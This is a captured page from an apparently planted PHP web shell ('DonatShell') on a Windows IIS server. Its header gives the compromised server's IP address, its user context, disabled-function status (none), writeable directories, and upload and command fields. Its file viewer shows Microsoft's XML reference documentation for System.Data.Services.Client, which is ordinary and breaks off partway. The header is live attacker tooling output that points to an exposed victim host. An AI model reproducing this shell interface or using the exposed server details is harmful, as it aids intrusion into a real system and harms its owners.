DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files (x86)/Reference Assemblies/Microsoft/Framework/v3.5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Program Files (x86)/Reference Assemblies/Microsoft/Framework/v3.5/System.Data.Services.Client.xml
<?xml version="1.0" encoding="utf-8"?>
<doc>
  <assembly>
    <name>System.Data.Services.Client</name>
  </assembly>
  <members>
    <member name="T:System.Data.Services.Client.ChangeOperationResponse">
      <summary>
                    Results returned after a call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" /> when enumerating operation responses returned by the <see cref="T:System.Data.Services.Client.DataServiceResponse" /> class.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.ChangeOperationResponse.Descriptor">
      <summary>
                    Gets the <see cref="T:System.Data.Services.Client.EntityDescriptor" /> or <see cref="T:System.Data.Services.Client.LinkDescriptor" /> modified by a change operation.
                </summary>
      <returns>
                    An <see cref="T:System.Data.Services.Client.EntityDescriptor" /> or <see cref="T:System.Data.Services.Client.LinkDescriptor" /> modified by a change operation.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceClientException">
      <summary>
                    Represents errors that occur during execution of ADO.NET Data Services client applications.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceClientException.#ctor">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceClientException" /> class with a system-supplied message that describes the error. 
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceClientException.#ctor(System.String)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceClientException" /> class with a specified message that describes the error. 
                </summary>
      <param name="message">
                    The message that describes the exception. The caller of this constructor is required to ensure that this string has been localized for the current system culture.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceClientException.#ctor(System.String,System.Exception)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceClientException" /> class with a specified error message and a reference to the inner exception that is the cause of this exception. 
                </summary>
      <param name="message">
                    The message that describes the exception. The caller of this constructor is required to ensure that this string has been localized for the current system culture. 
                </param>
      <param name="innerException">
                    The exception that is the cause of the current exception. If the <paramref name="innerException" /> parameter is not null, the current exception is raised in a catch block that handles the inner exception. 
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceClientException.#ctor(System.String,System.Exception,System.Int32)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceClientException" /> class. 
                </summary>
      <param name="message">
                    The string value that contains the error message.
                </param>
      <param name="innerException">
                    The System.Exception object that contains the inner exception.
                </param>
      <param name="statusCode">
                    The integer value that contains status code.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceClientException.#ctor(System.String,System.Int32)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceClientException" /> class. 
                </summary>
      <param name="message">
                    The string value that contains the error message.
                </param>
      <param name="statusCode">
                    The integer value that contains status code.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceClientException.GetObjectData(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceClientException" /> class with serialized data.
                </summary>
      <param name="info">
                    The object that holds the serialized object data. 
                </param>
      <param name="context">
                    The contextual information about the source or destination. 
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceClientException.StatusCode">
      <summary>
                    Gets the HTTP error status code returned after <see cref="T:System.Data.Services.Client.DataServiceClientException" />.
                </summary>
      <returns>
                    An integer value that represents the exception.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceContext">
      <summary>
                    The <see cref="T:System.Data.Services.Client.DataServiceContext" /> represents the runtime context of an ADO.NET data service. ADO.NET Data Services are stateless, but the <see cref="T:System.Data.Services.Client.DataServiceContext" /> is not. State on the client is maintained between interactions in order to support features such as update management. This class, and the <see cref="T:System.Data.Services.Client.DataServiceQuery" /> class that represents a particular HTTP request to a data service, are the two main classes in the client library. 
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.#ctor(System.Uri)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceContext" /> class with the specified <paramref name="baseURI" />.
                </summary>
      <param name="serviceRoot">
                    An absolute URI that identifies the root of a data service.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.AddLink(System.Object,System.String,System.Object)">
      <summary>
                    Adds the specified link to the set of objects the <see cref="T:System.Data.Services.Client.DataServiceContext" /> is tracking.
                </summary>
      <param name="source">
                    The source object for the new link.
                </param>
      <param name="sourceProperty">
                    The property on the source object that identifies the object to which the source adds a link.
                </param>
      <param name="target">
                    The object in the new link to which the source will be linked. The target object must be of the type identified by the <paramref name="sourceProperty" /> parameter or a subtype of the type.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.AddObject(System.String,System.Object)">
      <summary>
                    Adds the specified object to the set of objects that the <see cref="T:System.Data.Services.Client.DataServiceContext" /> is tracking.
                </summary>
      <param name="entitySetName">
                    The name of the entity set to which the resource will be added.
                </param>
      <param name="entity">
                    The resource to be tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" /> in the added state.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.AttachLink(System.Object,System.String,System.Object)">
      <summary>
                    Notifies the <see cref="T:System.Data.Services.Client.DataServiceContext" /> to start tracking the specified link between the source and the specified target entity.
                </summary>
      <param name="source">
                    The source object in the new link.
                </param>
      <param name="sourceProperty">
                    The name of the property on the source object that represents the link between the source and target object.
                </param>
      <param name="target">
                    The target object in the link that is bound to the source object specified in this call. The target object must be of the type identified by the source property or a subtype.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.AttachTo(System.String,System.Object)">
      <summary>
                    Notifies the <see cref="T:System.Data.Services.Client.DataServiceContext" /> to start tracking the specified resource and supplies the location of the resource within the specified resource set.
                </summary>
      <param name="entitySetName">
                    The name of the set that contains the resource.
                </param>
      <param name="entity">
                    The resource to be tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" />. The resource is attached in the Unchanged state.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.AttachTo(System.String,System.Object,System.String)">
      <summary>
                    Notifies the <see cref="T:System.Data.Services.Client.DataServiceContext" /> to start tracking the specified resource and supplies the location of the resource within the specified resource set.
                </summary>
      <param name="entitySetName">
                    The string value that contains the name of the entity set to which to the entity is attached.
                </param>
      <param name="entity">
                    The entity to add.
                </param>
      <param name="etag">
                    An etag value representing the state of the entity the last time it was retrieved from the data service. This value is treated as an opaque string; no validation is done on it by the client library.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.BaseUri">
      <summary>
                    Gets the absolute URI identifying the root of the target data service. 
                </summary>
      <returns>
                    An absolute URI that identifies the root of an ADO.NET data service.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.BeginExecute``1(System.Uri,System.AsyncCallback,System.Object)">
      <summary>
                    Asynchronously sends the request so that this call does not block processing while waiting for the results from the service.
                </summary>
      <param name="requestUri">
                    The URI to which the query request will be sent. The URI may be any valid data service URI; it can contain $ query parameters.
                </param>
      <param name="callback">
                    Delegate to invoke when results are available for client consumption.
                </param>
      <param name="state">
                    User-defined state object passed to the callback.
                </param>
      <typeparam name="TElement">
                    The type returned by the query.
                </typeparam>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.BeginExecuteBatch(System.AsyncCallback,System.Object,System.Data.Services.Client.DataServiceRequest[])">
      <summary>
                    Asynchronously submits a group of queries as a batch to the data service.
                </summary>
      <param name="callback">
                    The delegate that is called when a response to the batch request is received.
                </param>
      <param name="state">
                    User-defined state object used to pass context data to the callback method.
                </param>
      <param name="queries">
                    The array of query requests to include in the batch request.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.BeginLoadProperty(System.Object,System.String,System.AsyncCallback,System.Object)">
      <summary>
                    Begins the operation to load the value of the specified property from the data service.
                </summary>
      <returns>
                    An IAsyncResult that represents the status of the asynchronous operation.
                </returns>
      <param name="entity">
                    The entity containing the property to load.
                </param>
      <param name="propertyName">
                    The name of the property on the specified entity to load.
                </param>
      <param name="callback">
                    The delegate called when a response to the request is received.
                </param>
      <param name="state">
                    The user-defined state object used to pass context data to the callback method.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.BeginSaveChanges(System.AsyncCallback,System.Object)">
      <summary>
                    Asynchronously submits the pending changes to the data service collected by the <see cref="T:System.Data.Services.Client.DataServiceContext" /> since the last time changes were saved.
                </summary>
      <returns>
                    An IAsyncResult that represents the status of the asynchronous operation.
                </returns>
      <param name="callback">
                    The delegate to call when the operation completes.
                </param>
      <param name="state">
                    The user-defined state object used to pass context data to the callback method.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.BeginSaveChanges(System.Data.Services.Client.SaveChangesOptions,System.AsyncCallback,System.Object)">
      <summary>
                    Asynchronously submits the pending changes to the data service collected by the <see cref="T:System.Data.Services.Client.DataServiceContext" /> since the last time changes were saved.
                </summary>
      <returns>
                    An IAsyncResult that represents the status of the asynchronous operation.
                </returns>
      <param name="options">
                    The options for how the client can save the pending set of changes.
                </param>
      <param name="callback">
                    The delegate to call when the operation completes.
                </param>
      <param name="state">
                    The user-defined state object used to pass context data to the callback method.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.CreateQuery``1(System.String)">
      <summary>
                    Creates a data service query for data of a specified generic type.
                </summary>
      <returns>
                    A new <see cref="T:System.Data.Services.Client.DataServiceQuery`1" /> instance that represents a data service query.
                </returns>
      <param name="entitySetName">
                    A string that resolves to a URI.
                </param>
      <typeparam name="T">
                    The type returned by the query
                </typeparam>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.Credentials">
      <summary>
                    Gets or sets the authentication information used by each query created using the <see cref="T:System.Data.Services.Client.DataServiceContex" /> object.
                </summary>
      <returns>
                    The base authentication interface for retrieving credentials for Web client authentication.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.DataNamespace">
      <summary>
                    Gets or sets the XML namespace for data items, not metadata items, of an Atom payload.
                </summary>
      <returns>
                    A string representing the XML namespace for data items of a payload in the ATOM format.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.DeleteLink(System.Object,System.String,System.Object)">
      <summary>
                    Changes the state of the link to deleted in the list of links being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" />.
                </summary>
      <param name="source">
                    The source object in the link to be marked for deletion.
                </param>
      <param name="sourceProperty">
                    The name of the property on the source object that represents the source in the link between the source and the target.
                </param>
      <param name="target">
                    The target object involved in the link that is bound to the source object. The target object must be of the type identified by the source property or a subtype.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.DeleteObject(System.Object)">
      <summary>
                    Changes the state of the specified object to be deleted in the <see cref="T:System.Data.Services.Client.DataServiceContext" />.
                </summary>
      <param name="entity">
                    The tracked entity to be changed to the deleted state.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.Detach(System.Object)">
      <summary>
                    Removes the entity from the list of entities that the <see cref="T:System.Data.Services.Client.DataServiceContext" /> is tracking.
                </summary>
      <returns>
                    Returns true if the specified entity was detached; otherwise false.
                </returns>
      <param name="entity">
                    The tracked entity to be detached from the <see cref="T:System.Data.Services.Client.DataServiceContext" />.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.DetachLink(System.Object,System.String,System.Object)">
      <summary>
                    Removes the specified link from the list of links being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" />.
                </summary>
      <returns>
                    Returns true if the specified entity was detached; otherwise false.
                </returns>
      <param name="source">
                    The source object participating in the link to be marked for deletion.
                </param>
      <param name="sourceProperty">
                    The name of the property on the source object that represents the source in the link between the source and the target.
                </param>
      <param name="target">
                    The target object involved in the link that is bound to the source object. The target object must be of the type identified by the source property or a subtype.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.EndExecute``1(System.IAsyncResult)">
      <summary>
                    Called to complete the <see cref="M:System.Data.Services.Client.DataServiceContext.BeginExecute``1(System.Uri,System.AsyncCallback,System.Object)" />.
                </summary>
      <param name="asyncResult">
        <see cref="T:System.IAsyncResult" /> object.
                </param>
      <typeparam name="TElement">
                    The type returned by the query.
                </typeparam>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.EndExecuteBatch(System.IAsyncResult)">
      <summary>
                    Called to complete the <see cref="M:System.Data.Services.Client.DataServiceContext.BeginExecuteBatch(System.AsyncCallback,System.Object,System.Data.Services.Client.DataServiceRequest[])" />.
                </summary>
      <returns>
                    The DataServiceResult object that indicates the result of the batch operation.
                </returns>
      <param name="asyncResult">
                    An IAsyncResult that represents the status of the asynchronous operation.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.EndLoadProperty(System.IAsyncResult)">
      <summary>
                    Called to complete the <see cref="M:System.Data.Services.Client.DataServiceContext.BeginLoadProperty(System.Object,System.String,System.AsyncCallback,System.Object)" /> operation.
                </summary>
      <param name="asyncResult">
                    An IAsyncResult that represents the status of the asynchronous operation.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.EndSaveChanges(System.IAsyncResult)">
      <summary>
                    Called to complete the <see cref="M:System.Data.Services.Client.DataServiceContext.BeginSaveChanges(System.AsyncCallback,System.Object)" /> operation.
                </summary>
      <returns>
                    A <see cref="T:System.Data.Services.Client.DataServiceResponse" /> object that indicates the result of the batch operation.
                </returns>
      <param name="asyncResult">
                    An IAsyncResult that represents the status of the asynchronous operation.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.Entities">
      <summary>
                    Gets a list of all the resources currently being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" />.
                </summary>
      <returns>
                    A list of all the resources currently being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" />. 
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.Execute``1(System.Uri)">
      <summary>
                    Used to query a data service by URI; the method causes an HTTP GET request to be issued to the data service. The request URI specified can be absolute or relative.
                </summary>
      <param name="requestUri">
                    The URI to which the query request will be sent. The URI may be any valid data service URI. Can contain $ query parameters.
                </param>
      <typeparam name="TElement">
                    The type that the query returns.
                </typeparam>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.ExecuteBatch(System.Data.Services.Client.DataServiceRequest[])">
      <summary>
                    Submits a group of queries as a batch to the data service.
                </summary>
      <param name="queries">
                    Array of <see cref="T:System.Data.Services.Client.DataServiceRequest[]" /> objects that comprise the queries.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.GetMetadataUri">
      <summary>
                    Gets a URI of the location of .edmx metadata.
                </summary>
      <returns>
                    A URI that identifies the location of the metadata description, in .edmx format, for the data service identified by the base URI that is passed to the constructor.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.IgnoreMissingProperties">
      <summary>
                    Gets or sets whether the properties read from the type must be mapped to properties on the client-side type.
                </summary>
      <returns>
                    A Boolean value that indicates whether the properties read from the type must be mapped to properties on the client-side type.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.Links">
      <summary>
                    Gets the collection of all associations or links currently being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" /> object.
                </summary>
      <returns>
                    A collection of all associations or links current being tracked by the current being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" /> object.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.LoadProperty(System.Object,System.String)">
      <summary>
                    Loads the value of a specified property from the data service.
                </summary>
      <param name="entity">
                    The entity containing the property to load.
                </param>
      <param name="propertyName">
                    The name of the property of the specified entity to load.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.MergeOption">
      <summary>
                    Gets or sets the synchronization option for receiving entities from a data service.
                </summary>
      <returns>
                    One of the members of the <see cref="T:System.Data.Services.Client.MergeOption" /> enumeration.
                </returns>
    </member>
    <member name="E:System.Data.Services.Client.DataServiceContext.ReadingEntity">
      <summary>
                    Fires after the entity has been completely read into the target entity.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.ResolveName">
      <summary>
                    Gets or sets a function to override the default type resolution strategy used by the client library when sending entities to a data service.
                </summary>
      <returns>
                    Returns a string that contains the name of the <see cref="T:System.Data.Services.Client.DataServiceContext" />.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.ResolveType">
      <summary>
                    Gets or sets a function used to override the default type resolution option used by the client library when receiving entities from a data service.
                </summary>
      <returns>
                    A function delegate that identifies an override function that is used to override the default type resolution option that is used by the client library.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.SaveChanges">
      <summary>
                    Saves the changes that the <see cref="T:System.Data.Services.Client.DataServiceContext" /> is tracking to storage.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.SaveChanges(System.Data.Services.Client.SaveChangesOptions)">
      <summary>
                    Saves the changes that the <see cref="T:System.Data.Services.Client.DataServiceContext" /> is tracking to storage.
                </summary>
      <returns>
                    A <see cref="T:System.Data.Services.Client.DataServiceResponse" /> containing status, headers, and errors that result from the call to <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" />.
                </returns>
      <param name="options">
                    A member of the <see cref="T:System.Data.Services.Client.MergeOption" /> enumeration that specifies the materialization option.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.SaveChangesDefaultOptions">
      <summary>
                    Gets or sets the <see cref="T:System.Data.Services.Client.SaveChangesOptions" /> values used by the <see cref="M:System.Data.Services.Client.DataServiceContext.SaveChanges" /> method.
                </summary>
    </member>
    <member name="E:System.Data.Services.Client.DataServiceContext.SendingRequest">
      <summary>
                    Fires when a new HttpWebRequest has been created.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.SetLink(System.Object,System.String,System.Object)">
      <summary>
                    Notifies the <see cref="T:System.Data.Services.Client.DataServiceContext" /> that a new link exists between the objects specified and that the link is represented by the property specified by the <paramref name="sourceProperty" /> parameter.
                </summary>
      <param name="source">
                    The source object for the new link.
                </param>
      <param name="sourceProperty">
                    The property on the source object that identifies the target object of the new link.
                </param>
      <param name="target">
                    The child object involved in the new link that is to be initialized by calling this method. The target object must be a subtype of the type identified by the <paramref name="sourceProperty" /> parameter. If <paramref name="target" /> is set to null, the call represents a delete link operation.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.Timeout">
      <summary>
                    Gets or sets the timeout option used for the underlying HTTP request to the data service.
                </summary>
      <returns>
                    An integer that indicates the time interval before timeout of a service request.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.TryGetEntity``1(System.Uri,``0@)">
      <summary>
                    Test retrieval of an entity being tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" /> by reference to the URI of the entity.
                </summary>
      <returns>
                    If an entity is found at <paramref name="resourceUri" />, the entity is returned in the out parameter <paramref name="entity" /> and true is returned. If no entity is found, false is returned.
                </returns>
      <param name="identity">
                    The URI of the tracked entity to be retrieved.
                </param>
      <param name="entity">
                    The entity to be retrieved.
                </param>
      <typeparam name="TEntity">
                    The type of the entity.
                </typeparam>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.TryGetUri(System.Object,System.Uri@)">
      <summary>
                    Retrieves the canonical URI associated with the specified entity, if available.
                </summary>
      <returns>
                    Returns true if the canonical URI is returned in the out parameter. If the specified entity is not tracked by the <see cref="T:System.Data.Services.Client.DataServiceContext" /> or is in the added state, no URI is available and false is returned.
                </returns>
      <param name="entity">
                    The entity identified by the <paramref name="identity" />.
                </param>
      <param name="identity">
                    The URI of the entity.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.TypeScheme">
      <summary>
                    Gets or sets the URI used to indicate what type scheme is used by the service.
                </summary>
      <returns>
                    A <see cref="T:System.Uri" /> object that contains the type scheme.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceContext.UpdateObject(System.Object)">
      <summary>
                    Changes the state of the specified object in the <see cref="T:System.Data.Services.Client.DataServiceContext" /> to <see cref="F:System.Data.Services.Client.EntityStates.Modified" />.
                </summary>
      <param name="entity">
                    The tracked entity to be assigned to the <see cref="F:System.Data.Services.Client.EntityStates.Modified" />  state.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceContext.UsePostTunneling">
      <summary>
                    Gets or sets a Boolean value that indicates whether to use post tunneling.
                </summary>
      <returns>
                    A Boolean value that indicates whether to use post tunneling.
                </returns>
    </member>
    <member name="E:System.Data.Services.Client.DataServiceContext.WritingEntity">
      <summary>
                    Fires after an entity has been fully serialized into XML (Atom), and allows the developer to change the XML before it is sent.
                </summary>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceQuery">
      <summary>
                    An abstract class that represents a single query request to a data service. 
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceQuery.Expression">
      <summary>
                    Represents an expression containing the query to the data service.
                </summary>
      <returns>
                    A <see cref="T:System.Linq.Expressions.Expression" /> object representing the query.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceQuery.Provider">
      <summary>
                    Represents the query provider instance.
                </summary>
      <returns>
                    A <see cref="T:System.Linq.IQueryProvider" /> representing the data source provider.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery.System#Collections#IEnumerable#GetEnumerator">
      <summary>
                    Gets the <see cref="T:System.Collections.IEnumerator" /> object that can be used to iterate through the collection returned by the query.
                </summary>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceQuery`1">
      <summary>
                    Represents a single query request to a data service.
                </summary>
      <typeparam name="TElement">
                    Type of results returned by the query.
                </typeparam>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.AddQueryOption(System.String,System.Object)">
      <summary>
                    Creates a new <see cref="T:System.Data.Services.Client.DataServiceQuery`1" /> with the query option set in the URI generated by the returned query.
                </summary>
      <param name="name">
                    The string value that contains the name of the query string option to add.
                </param>
      <param name="value">
                    The object that contains the value of the query string option.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.BeginExecute(System.AsyncCallback,System.Object)">
      <summary>
                    Starts an asynchronous network operation that executes the query represented by this object instance.
                </summary>
      <returns>
                    An IAsyncResult that represents the status of the asynchronous operation.
                </returns>
      <param name="callback">
                    The delegate to invoke when the operation completes.
                </param>
      <param name="state">
                    User defined object used to transfer state between the start of the operation and the callback defined by <paramref name="callback" />.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceQuery`1.ElementType">
      <summary>
                    Returns the type of the object used in the template to create the DataServiceQuery instance.
                </summary>
      <returns>
                    Returns <see cref="T:System.Type" /> representing the type used in the template when the query is created.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.EndExecute(System.IAsyncResult)">
      <summary>
                    Ends an asynchronous query request to a data service.
                </summary>
      <returns>
                    Returns IEnumerable that contains the results of the query operation.
                </returns>
      <param name="asyncResult">
                    The pending asynchronous query request.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.Execute">
      <summary>
                    Executes the query and returns the results as a collection that implements IEnumerable.
                </summary>
      <returns>IEnumerable in which T represents the type of the query results.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.Expand(System.String)">
      <summary>
                    Creates a new <see cref="T:System.Data.Services.Client.DataServiceQuery`1" /> with the expand option set in the URI generated by the returned query.
                </summary>
      <param name="path">
                    A string value that contains the requesting URI.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceQuery`1.Expression">
      <summary>
                    Represents an expression containing the query to the data service.
                </summary>
      <returns>
                    A <see cref="T:System.Linq.Expressions.Expression" /> object representing the query.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.GetEnumerator">
      <summary>
                    Executes the query and returns the results as a collection.
                </summary>
      <returns>IEnumerator&lt;T&gt; in which T represents the type of the query results.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceQuery`1.Provider">
      <summary>
                    Represents the query provider instance.
                </summary>
      <returns>
                    A <see cref="T:System.Linq.IQueryProvider" /> representing the data source provider.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceQuery`1.RequestUri">
      <returns>
                    A T:System.Uri object that contains the URI of the request.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.System#Collections#IEnumerable#GetEnumerator">
      <summary>
                    Executes the query and returns the results as a collection.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQuery`1.ToString">
      <summary>
                    Represents the URI of the query to the data service.
                </summary>
      <returns>
                    A URI as string that represents the query to the data service for this DataServiceQuery instance.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceQueryException">
      <summary>
                    Exception that indicates an error occurred loading the property value from the data service. 
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQueryException.#ctor">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceQueryException" /> class with a system-supplied message that describes the error. 
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQueryException.#ctor(System.String)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceQueryException" /> class with a specified message that describes the error. 
                </summary>
      <param name="message">
                    The message that describes the exception. The caller of this constructor is required to ensure that this string has been localized for the current system culture.
                
                    The string value that the contains error message.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQueryException.#ctor(System.String,System.Exception)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceQueryException" /> class with a specified error message and a reference to the inner exception that is the cause of this exception. 
                </summary>
      <param name="message">
                    The message that describes the exception. The caller of this constructor is required to ensure that this string has been localized for the current system culture. 
                
                    The string value that contains the error message.
                </param>
      <param name="innerException">
                    The exception that is the cause of the current exception. If the <paramref name="innerException" /> parameter is not null, the current exception is raised in a catch block that handles the inner exception. 
                
                    The inner exception object.
                </param>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceQueryException.#ctor(System.String,System.Exception,System.Data.Services.Client.QueryOperationResponse)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceQueryException" /> class. 
                </summary>
      <param name="message">
                    The string value that contains the error message.
                </param>
      <param name="innerException">
                    The inner exception object.
                </param>
      <param name="response">
                    The <see cref="T:System.Data.Services.Client.QueryOperationResponse" /> object.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceQueryException.Response">
      <summary>
                    Gets the <see cref="T:System.Data.Services.Client.QueryOperationResponse" /> that indicates the exception results.
                </summary>
      <returns>
                    A <see cref="T:System.Data.Services.Client.QueryOperationResponse" /> object that indicates the exception results.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceRequest">
      <summary>
                    Represents request objects submitted as a batch to the data service.
                </summary>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceRequest.ElementType">
      <summary>
                    Gets the type of object submitted as a batch to the data service.
                </summary>
      <returns>
                    Type object.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceRequest.RequestUri">
      <summary>
                    Gets the URI of the request object submitted to a data service.
                </summary>
      <returns>
                    URI of the request object.
                </returns>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceRequest.ToString">
      <summary>
                    Represents the URI of the query to the data service. 
                </summary>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceRequest`1">
      <summary>
                    Represents request objects submitted as a batch to the data service.
                </summary>
      <typeparam name="TElement"></typeparam>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceRequest`1.#ctor(System.Uri)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceRequest`1" /> class. 
                </summary>
      <param name="requestUri">
                    The URI object that contains the request string.
                </param>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceRequest`1.ElementType">
      <summary>
                    Gets the type of the object used to create the <see cref="T:System.Data.Services.Client.DataServiceRequest`1" /> instance.
                </summary>
      <returns>
                    A <see cref="System.Type" /> value that indicates the type of data returned.
                </returns>
    </member>
    <member name="P:System.Data.Services.Client.DataServiceRequest`1.RequestUri">
      <summary>
                    Gets the URI object that contains the request string.
                </summary>
      <returns>
                    A <see cref="System.Uri" /> object that contains the request string.
                </returns>
    </member>
    <member name="T:System.Data.Services.Client.DataServiceRequestException">
      <summary>
                    Represents the error thrown if the data service returns a response code less than 200 or greater than 299, or the top-level element in the response is &lt;error&gt;. This class cannot be inherited.
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceRequestException.#ctor">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceRequestException" /> class with a system-supplied message that describes the error. 
                </summary>
    </member>
    <member name="M:System.Data.Services.Client.DataServiceRequestException.#ctor(System.String)">
      <summary>
                    Initializes a new instance of the <see cref="T:System.Data.Services.Client.DataServiceRequestException" /> class with a specified message that describes the error. 
                </summary>
      <param name="message">
